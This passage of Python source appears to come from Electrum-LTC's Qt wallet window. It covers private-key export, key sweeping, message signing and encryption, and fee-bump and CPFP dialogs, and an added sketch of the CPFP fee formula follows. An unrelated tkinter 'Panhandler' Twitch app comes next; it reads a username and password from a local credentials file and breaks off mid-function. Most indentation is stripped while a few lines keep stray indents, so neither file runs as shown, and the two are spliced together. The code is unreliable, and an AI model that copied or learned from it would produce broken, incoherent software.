der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(data, parent or self, title, help_text=help_text,
show_copy_text_btn=show_copy_text_btn)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
# if redeem_script:
# vbox.addWidget(QLabel(_("Redeem Script") + ':'))
# rds_e = ShowQRTextEdit(text=redeem_script)
# rds_e.addCopyButton(self.app)
# vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum_ltc.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum_ltc import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a litecoin URI
if str(data).startswith("litecoin:"):
self.pay_to_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"),
TRANSACTION_FILE_EXTENSION_FILTER_ANY)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(self, _('Input channel backup'), _("Channel Backup:"), _("Load backup"))
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_ltc import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
else:
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-ltc-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
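# Private keys are derived on a background thread; computing_privkeys_signal updates the
# progress text and show_privkeys_signal fills the textbox when done. Closing the dialog
# early sets 'cancelled' so the thread stops and the signals are disconnected.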
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
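# sweep_key_dialog(): the user pastes WIF private keys and picks a destination address
# (an unused wallet address by default). sweep_preparations() gathers the keys' UTXOs on
# the network thread, then pay_onchain_dialog() builds a spend-max ('!') transaction to
# that address, signed with the external keypairs.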
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
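# child_fee = desired_total_feerate * (parent_size + child_size) / 1000 - parent_fee,
# clamped to at most the available input value and to at least ~1 sat/byte of the
# combined size (the 'max(total_size, fee)' line below).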
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
            return  # fee left empty, treat it as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label_for_txid(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, coins=self.get_coins())
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_('Cannot cancel transaction') + ': ' + _('unknown fee for original transaction'))
return
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Cancel transaction'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Cancel an unconfirmed RBF transaction by double-spending "
"its inputs back to your wallet with a higher fee.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate)
except CannotDoubleSpendTx as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
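
# Illustrative sketch (not part of the Electrum window code above): the child-fee
# arithmetic behind the CPFP dialog. Given a desired combined feerate in sat/kB,
# the child pays for both transactions minus what the parent already paid, clamped
# so the result stays within [total_size, max_fee] (at least 1 sat/byte overall).
# The numeric values below are assumptions chosen only to demonstrate the formula.
def example_cpfp_child_fee(total_size, parent_fee, max_fee, fee_per_kb):
    fee = fee_per_kb * total_size / 1000 - parent_fee
    fee = min(max_fee, fee)
    fee = max(total_size, fee)
    return fee

# 400 vbytes combined, 200 sat already paid by the parent, 5000 sat/kB target -> 1800 sat child fee
assert example_cpfp_child_fee(total_size=400, parent_fee=200, max_fee=50000, fee_per_kb=5000) == 1800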
|
application.py
|
from tkinter import *
from panhandler import *
import threading
from subprocess import call
root = Tk()
root.configure(background='#404040', padx=10, pady=10)
root.title("Panhandler")
title = Label(root, text="That Panhandlin' Bitch")
title.configure(background='#404040', fg='#FFFFFF')
title.grid(row=0, column=0)
usernameLabel = Label(root, text="Enter your Twitch username", pady=10)
usernameLabel.configure(background='#404040', fg='#FFFFFF')
usernameLabel.grid(row=1, column=0)
credentials = open("credentials.txt", "r")
username = Entry(root, width=40)
username.grid(row=2, column=0)
username.insert(0, credentials.readline().strip())
passwordLabel = Label(root, text="Enter your Twitch password", pady=10)
passwordLabel.configure(background='#404040', fg='#FFFFFF')
passwordLabel.grid(row=3, column=0)
password = Entry(root, show='*', width=40)
password.grid(row=4, column=0)
password.insert(0, credentials.readline().strip())
credentials.close()
streamerLabel = Label(root, text="Enter a streamer's username", pady=10)
streamerLabel.configure(background='#404040', fg='#FFFFFF')
streamerLabel.grid(row=5, column=0)
streamer = Entry(root, width=40)
streamer.grid(row=6, column=0)
streamer.insert(0, "")
def executeScrape(username, password, streamerName, message, userDelay):
print("Ready to run scraping process for {}".format(streamerName))
scrape(username, password, streamerName, message, userDelay)
def startScrape():
    streamerError = Label(root, text="Streamer username is required")
    if streamer.get():
        streamerName = streamer.get()
        streamerError.grid_forget()
    else:
